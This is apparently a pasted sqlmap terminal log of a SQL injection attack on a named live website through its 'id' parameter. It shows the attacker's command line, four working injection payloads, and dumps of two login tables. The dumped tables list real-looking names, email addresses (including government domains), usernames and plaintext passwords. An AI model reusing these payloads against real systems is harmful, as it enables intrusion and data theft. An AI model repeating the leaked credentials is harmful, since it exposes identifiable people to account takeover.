  636. [*] starting at 09:07:20
  637.  
  638. [09:07:21] [INFO] resuming back-end DBMS 'mysql'
  639. [09:07:22] [INFO] testing connection to the target URL
  640. [09:07:25] [INFO] heuristics detected web page charset 'ISO-8859-2'
  641. sqlmap resumed the following injection point(s) from stored session:
  642. ---
  643. Parameter: id (GET)
  644. Type: boolean-based blind
  645. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  646. Payload: id=29 OR NOT 3833=3833#
  647.  
  648. Type: error-based
  649. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  650. Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  651.  
  652. Type: AND/OR time-based blind
  653. Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
  654. Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
  655.  
  656. Type: UNION query
  657. Title: Generic UNION query (NULL) - 13 columns
  658. Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  659. ---
  660. [09:07:25] [INFO] the back-end DBMS is MySQL
  661. web application technology: PHP 5.6.31, Apache 2.4.27
  662. back-end DBMS: MySQL 5.0
  663. [09:07:25] [INFO] fetching entries of column(s) 'ID, email, name, password, username' for table 'login' in database 'acfmissi_acfmdb'
  664. [09:07:25] [INFO] the SQL query used returns 9 entries
  665. [09:07:26] [INFO] retrieved: "1","webprince64@yahoo.com","Adex","ahmed1","dayo"
  666. [09:07:27] [INFO] retrieved: "2","ojo@nsiwc.gov.ng","ojo","dayo","ojo"
  667. [09:07:28] [INFO] retrieved: "3","e_josseph@yahoo.com","Emmanuel Joseph","pas...
  668. [09:07:29] [INFO] retrieved: "4","hrowlands@sec.gov.ng","henry rowlands","pas...
  669. [09:07:30] [INFO] retrieved: "5","ope@ope.com","ope","ope","opeyemi"
  670. [09:07:31] [INFO] retrieved: "6","alf@afafag.com","alfred ako","alfred","alfred"
  671. [09:07:32] [INFO] retrieved: "7","clementyari@yahoo.com","clement","health","...
  672. [09:07:32] [INFO] retrieved: "8","dally@yahoo.com","david","davidally","david...
  673. [09:07:33] [INFO] retrieved: "9","info@acfmission.org","ACFM Admin","eternalh...
  674. [09:07:33] [INFO] analyzing table dump for possible password hashes
  675. Database: acfmissi_acfmdb
  676. Table: login
  677. [9 entries]
  678. +-----------------------+-----------+-------------+-----------------+----+
  679. | email | username | password | name | ID |
  680. +-----------------------+-----------+-------------+-----------------+----+
  681. | webprince64@yahoo.com | dayo | ahmed1 | Adex | 1 |
  682. | ojo@nsiwc.gov.ng | ojo | dayo | ojo | 2 |
  683. | e_josseph@yahoo.com | ejoseph | password | Emmanuel Joseph | 3 |
  684. | hrowlands@sec.gov.ng | hrowlands | password | henry rowlands | 4 |
  685. | ope@ope.com | opeyemi | ope | ope | 5 |
  686. | alf@afafag.com | alfred | alfred | alfred ako | 6 |
  687. | clementyari@yahoo.com | clement | health | clement | 7 |
  688. | dally@yahoo.com | davidade | davidally | david | 8 |
  689. | info@acfmission.org | acfmadmin | eternalhqx5 | ACFM Admin | 9 |
  690. +-----------------------+-----------+-------------+-----------------+----+
  691.  
  692. [09:07:33] [INFO] table 'acfmissi_acfmdb.login' dumped to CSV file '/root/.sqlmap/output/acfmission.org/dump/acfmissi_acfmdb/login.csv'
  693. [09:07:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
  694. root@BitCoin:/home/helmi# sqlmap -u http://acfmission.org/acfmdisp.php?id=29 -D acfmissi_acfmdb -T userlogin -C Username,Password,ID --dump
  695. _
  696. ___ ___| |_____ ___ ___ {1.0.4.0#dev}
  697. |_ -| . | | | .'| . |
  698. |___|_ |_|_|_|_|__,| _|
  699. |_| |_| http://sqlmap.org
  700.  
  701. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  702.  
  703. [*] starting at 09:12:28
  704.  
  705. [09:12:28] [INFO] resuming back-end DBMS 'mysql'
  706. [09:12:29] [INFO] testing connection to the target URL
  707. [09:12:30] [INFO] heuristics detected web page charset 'ISO-8859-2'
  708. sqlmap resumed the following injection point(s) from stored session:
  709. ---
  710. Parameter: id (GET)
  711. Type: boolean-based blind
  712. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
  713. Payload: id=29 OR NOT 3833=3833#
  714.  
  715. Type: error-based
  716. Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
  717. Payload: id=29 OR (SELECT 4234 FROM(SELECT COUNT(*),CONCAT(0x7178706271,(SELECT (ELT(4234=4234,1))),0x716a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  718.  
  719. Type: AND/OR time-based blind
  720. Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
  721. Payload: id=29 OR (SELECT * FROM (SELECT(SLEEP(5)))dSer)
  722.  
  723. Type: UNION query
  724. Title: Generic UNION query (NULL) - 13 columns
  725. Payload: id=29 UNION ALL SELECT NULL,CONCAT(0x7178706271,0x636c49464162666d765a464c537a534a6f62594a5248666d444b584178796967557a494864566145,0x716a717171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
  726. ---
  727. [09:12:30] [INFO] the back-end DBMS is MySQL
  728. web application technology: PHP 5.6.31, Apache 2.4.27
  729. back-end DBMS: MySQL 5.0
  730. [09:12:30] [INFO] fetching entries of column(s) 'ID, Password, Username' for table 'userlogin' in database 'acfmissi_acfmdb'
  731. [09:12:31] [INFO] the SQL query used returns 2 entries
  732. [09:12:32] [INFO] retrieved: "0","xdayox","dayo"
  733. [09:12:33] [INFO] retrieved: "1","zuwvmuc3","admin_nsiwc"
  734. [09:12:33] [INFO] analyzing table dump for possible password hashes
  735. Database: acfmissi_acfmdb
  736. Table: userlogin
  737. [2 entries]
  738. +-------------+----------+----+
  739. | Username | Password | ID |
  740. +-------------+----------+----+
  741. | dayo | xdayox | 0 |
  742. | admin_nsiwc | zuwvmuc3 | 1 |
  743. +-------------+----------+----+
  744.  
  745. [09:12:33] [INFO] table 'acfmissi_acfmdb.userlogin' dumped to CSV file '/root/.sqlmap/output/acfmission.org/dump/acfmissi_acfmdb/userlogin.csv'
  746. [09:12:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/acfmission.org'
  747. root@BitCoin:/home/helmi#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!